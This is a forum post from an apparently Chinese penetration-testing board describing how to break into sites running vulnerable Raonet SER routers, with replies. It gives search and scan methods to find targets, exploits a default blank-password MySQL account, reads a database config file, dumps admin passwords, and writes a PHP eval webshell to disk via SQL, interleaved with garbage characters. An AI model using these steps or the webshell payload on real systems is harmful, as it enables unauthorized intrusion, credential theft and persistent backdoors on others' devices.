中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
* q" Z# T( ~  {2 P; @! ~
. V2 C& Q0 w- j: v; L% t$ A5 a1:google搜索'Raonet Subscriber Ethernet Router'+ }3 o5 s& J2 ^8 X7 ]  f2 s5 J
5 r' U9 l2 _: S& J2 \* [
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# F- C7 ?2 d* [$ U$ q+ T2 D+ J. i% K% P5 ~1 P; j1 q* K9 ^
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! B2 l* C! p" p1 U6 i8 g  s( |; _+ o! D& l) B- o
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
  m" {" i4 z. }& k8 R  M# G4 {2 Q. d$ I* @4 h9 `
& S8 m8 {  r" _5 {6 @: ?& a
% J9 Y$ M7 j7 v+ H
入侵步骤:- p+ B$ V" v$ p, H6 s8 R& s+ j/ V) d( O
, f3 f9 w. y9 F$ U8 T" I& M  {
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
- A: V3 V5 q5 L" d  {& z) a$ |0 [" A: t4 \& N! |$ |( p; D6 y2 }
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc  ^4 e, l, o/ V' ?3 V/ y& W
3:得到密码后连接,查看GUI管理密码:
/ R) O$ f# \4 M% g* Juse ser_5000 F7 e8 i" H6 X" t& Q
select id,passwd from user;6 O' T, b, ]% K/ B3 p+ k( M
4:通过数据库写入webshell,执行命令:% k- G0 [! I& Y  H: l
use mysql;2 s, i1 ]4 p8 b
create table ok(cmd TEXT);
8 A; G, V1 j2 E* |insert into ok values("<?php @eval($_POST[cmd])?>");
6 y; ]+ q* n2 B5 ]2 w4 G+ ~1 ~9 [/ Iselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";4 _: _% N  e- }* ?
drop table ok;9 T. t  b5 t! p" m

# W: A9 ~8 u% B1 g5:连接后门shell.php 3 ^+ [$ w; s! a5 t9 r7 s

) b. M- `' }. g' ]" P: x6. 搞定!
2 C9 F! w! t& c! a; i( B+ |3 x" ^
2 a6 u8 T9 b  X! y) z
作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2